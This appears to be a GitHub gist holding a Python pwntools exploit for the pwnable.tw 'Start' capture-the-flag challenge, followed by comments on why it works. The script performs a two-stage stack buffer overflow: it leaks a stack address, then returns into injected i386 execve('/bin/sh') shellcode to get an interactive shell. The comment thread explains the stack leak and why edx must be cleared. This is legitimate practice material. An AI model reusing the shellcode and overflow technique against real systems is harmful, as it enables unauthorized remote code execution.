@0xPwny
Created February 25, 2017 15:40
Pwnable.tw - Start
#!/usr/bin/python
# ABDELJALIL NOUIRI
# author : [email protected]
from pwn import *

HOST = 'chall.pwnable.tw'
PORT = 10000

# 23-byte i386 execve("/bin//sh") shellcode. It never touches edx, so the
# second stage below prefixes it with xor edx,edx (see the comments thread).
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

gad = 0x8048087  # mov %esp,%ecx

def Expl0i7i7(ip, port):
    con = remote(ip, port)
    con.recv()                                  # banner
    # Stage 1: 20 bytes of filler, then the gadget address over the saved
    # return address. After ret, the program writes from esp, leaking a
    # stack address back to us.
    payload = "A"*20 + p32(gad)
    con.send(payload)
    leak = u32(con.recv(4))                     # first 4 bytes are the stack address
    print hex(leak)
    con.recv()
    # Stage 2: same filler, return address pointing at where the shellcode
    # will sit on the stack (leak+0x18), 4 bytes of padding, xor edx,edx,
    # then the shellcode itself.
    payload = 'A'*20 + p32(leak+0x18) + "DEAD" + '\x31\xd2' + shellcode
    con.send(payload)
    con.interactive("\nshell# ")

Expl0i7i7(HOST, PORT)
@yywing
yywing commented Mar 7, 2017

Hey, I saw your writeup, and I have a problem.
payload = 'A'*20+p32(leak+0x18)+"DEAD"+'\x31\xd2'+shellcode
esp is different every time, so why is esp equal to leak the next time?
My English is ugly.
Please help me.
Or you can tell me how you solved this question.
And you can email me, [email protected]
Thank you very much!!!!!

@hksuki
hksuki commented Jul 11, 2017

Hello, I wrote a writeup but receive an EOF error, but when I replace it with the '\x31\xd2', everything is fine. I cannot get what's happened; can you tell me why?
You can email me, [email protected].
Thank you very much!

@quangnh89
@yywing:
payload = "A"*20+p32(gad) will overwrite the return address. After the retn instruction executes, eip is equal to 0x8048087. Now esp points to a variable that contains an address in the stack. This value can be read.

@hksuki:
You should read the execve manual page carefully. The third argument of execve points to the environment block and it should be NULL. The third argument is held in edx. '\x31\xd2' = xor edx, edx
